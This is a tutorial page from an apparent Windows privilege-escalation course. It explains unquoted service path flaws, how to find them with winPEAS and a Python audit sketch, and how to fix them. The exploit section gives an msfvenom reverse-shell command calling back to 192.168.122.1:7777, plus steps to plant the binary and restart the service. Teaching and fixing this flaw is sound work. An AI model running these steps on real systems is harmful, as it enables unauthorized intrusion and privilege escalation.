# 8 - Unquoted Service Path

#### Topics

> 1. Introduction to the Windows Shells
> 2. Windows Permissions
> 3. Reverse Shells in Windows
> 4. SeImpersonatePrivilege Exploitation
> 5. On Cross Compilation
> 6. Windows Services
> 7. Weak Service Permissions
> 8. Unquoted Service Path
> 9. DLL Hijacking
> 10. Always Install Elevated
> 11. Files with Sensitive Data
> 12. Windows Hashes
> 13. Stored Credentials and the Windows Vault
> 14. Scheduled Task
> 15. Critical Registry Paths
> 16. Useful Tools
> 17. AMSI Bypass

## **Unquoted Service Path Vulnerability**

The **unquoted service path** vulnerability arises when a Windows service binary's path contains spaces but is not enclosed in quotation marks. Windows then resolves the ambiguous path by trying a fixed sequence of candidate executables, and an attacker can abuse that search order.

When starting a service, Windows interprets its binary path as specified in the service configuration. If the path contains spaces and is unquoted, the system checks multiple potential executable paths in order, which can lead to unintended execution.

### **Example Service Configuration**

```bash
SERVICE_NAME: SimpleService
    BINARY_PATH_NAME: C:\Users\Quickemu\Downloads\Example Directory\Another Directory\simpleService.exe
```

If the above path is unquoted, Windows will attempt to execute the following binaries in this order:

1. `C:\Users\Quickemu\Downloads\Example.exe`
2. `C:\Users\Quickemu\Downloads\Example Directory\Another.exe`
3. `C:\Users\Quickemu\Downloads\Example Directory\Another Directory\simpleService.exe`

#### **Attack Scenario**

An attacker with write access to any of the intermediary directories can plant a malicious binary, such as `Example.exe`. When the service starts, Windows will execute the malicious binary instead of the intended service binary.

***

## **Exploiting Unquoted Service Paths**

### **Exploit Steps**

1. **Identify the Vulnerable Service**\
   View the service configuration:

   ```bash
   sc.exe qc SimpleService
   ```
2. **Create a Malicious Binary**\
   Generate a reverse shell binary:

   ```bash
   msfvenom -p windows/shell_reverse_tcp LHOST=192.168.122.1 LPORT=7777 -f exe -o malicious.exe
   ```
3. **Place the Malicious Binary in a Targeted Path**

   ```bash
   move malicious.exe "C:\Users\Quickemu\Downloads\Example.exe"
   ```
4. **Restart the Service**

   ```bash
   sc.exe stop SimpleService
   sc.exe start SimpleService
   ```

When the service restarts, Windows will execute `Example.exe` instead of `simpleService.exe`, effectively hijacking the service.

***

### **Additional Examples**

#### **Example 1**

For the binary path:

```bash
C:\Program Files (x86)\Company\Company App\App.exe
```

The following binaries will be checked in order:

1. `C:\Program.exe`
2. `C:\Program Files.exe`
3. `C:\Program Files (x86)\Company\Company.exe`
4. `C:\Program Files (x86)\Company\Company App\App.exe`

#### **Example 2**

For the binary path:

```bash
C:\Program\Cool Company\Cool Binary.exe
```

The following binaries will be checked in order:

1. `C:\Program\Cool.exe`
2. `C:\Program\Cool Company\Cool.exe`
3. `C:\Program\Cool Company\Cool Binary.exe`

***

## **Enumeration of Unquoted Service Paths**

**Using winPEAS**

`winPEAS` can identify unquoted service paths.

```bash
.\winPEAS.exe quiet servicesinfo
```

**Example Output**

Look for the following indicators in the output:

```bash
SimpleService(SimpleService)[C:\Users\Quickemu\Downloads\Example Directory\Another\simpleService.exe]  
No quotes and Space detected  
File Permissions: Quickemu [AllAccess]  
Possible DLL Hijacking in binary folder: C:\Users\Quickemu\Downloads\Example Directory (Quickemu [AllAccess])
```
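
The check behind the "No quotes and Space detected" finding, together with the search order described earlier, can be reproduced offline. The following Python sketch is an added example, not part of winPEAS or the original page; it assumes the service binary name ends in `.exe`, and every service name other than `SimpleService` plus the last three sample values are constructed.

```python
import ntpath

def candidate_paths(image_path):
    """Executables Windows tries, in order, for a service ImagePath value."""
    value = image_path.strip()
    if value.startswith('"'):            # quoted: one unambiguous target
        return [value[1:].split('"', 1)[0]]
    tokens, candidates = value.split(" "), []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        ends_binary = prefix.lower().endswith(".exe")
        if "." not in ntpath.basename(prefix):
            prefix += ".exe"             # .exe is appended when no extension is present
        candidates.append(prefix)
        if ends_binary:                  # assumption: everything after is arguments
            break
    return candidates

def audit(services):
    """Return {name: (paths tried before the real binary, quoted ImagePath)}."""
    findings = {}
    for name, image_path in services.items():
        cands = candidate_paths(image_path)
        if len(cands) > 1:               # something is tried before the real binary
            real = cands[-1]
            args = image_path.strip()[len(real):]   # keep arguments outside the quotes
            findings[name] = (cands[:-1], f'"{real}"{args}')
    return findings

# Constructed sample input: name -> ImagePath as stored in the registry.
SERVICES = {
    "SimpleService": r"C:\Users\Quickemu\Downloads\Example Directory"
                     r"\Another Directory\simpleService.exe",
    "CompanyApp": r"C:\Program Files (x86)\Company\Company App\App.exe",
    "ArgsSvc": r"C:\Program Files\Vendor\agent.exe --config C:\ProgramData\agent.ini",
    "QuotedSvc": r'"C:\Program Files\Vendor\agent.exe" --run',
    "NoSpaceSvc": r"C:\Windows\System32\svchost.exe -k netsvcs",
}

if __name__ == "__main__":
    for name, (early, fixed) in audit(SERVICES).items():
        print(name)
        for path in early:
            print("  check who can write to the folder of:", path)
        print("  quoted ImagePath:", fixed)
```

Only the first three sample services are reported; for each one, the folders of the earlier candidates are where write permissions should be reviewed, and the quoted value covers the executable only, leaving any arguments outside the quotes.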

***

## **Fixing the Vulnerability**

### **Fix Using RegEdit**

1. Open the Registry Editor (`regedit.exe`).
2. Navigate to:

   ```plaintext
   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SimpleService
   ```
3. Locate the `ImagePath` value and add quotes around the binary path:

   ```plaintext
   "C:\Users\Quickemu\Downloads\Example Directory\Another Directory\simpleService.exe"
   ```

### **Fix Using sc.exe**

Use the `sc.exe` command to update the service path with quotes:

```cmd
sc.exe config SimpleService binPath= "\"C:\Users\Quickemu\Downloads\Example Directory\Another Directory\simpleService.exe\""
```

***

## Other Resources

* [Windows Privilege Escalation: Unquoted Service Path](https://www.hackingarticles.in/windows-privilege-escalation-unquoted-service-path/)
* [Fixing Unquoted Search Paths Using Powershell](https://www.itsecguy.com/fixing_unquoted/)

{% hint style="danger" %}
**Disclaimer**

**❗ Never use tools and techniques on real IP addresses, hosts or networks without proper authorization! ❗**
{% endhint %}


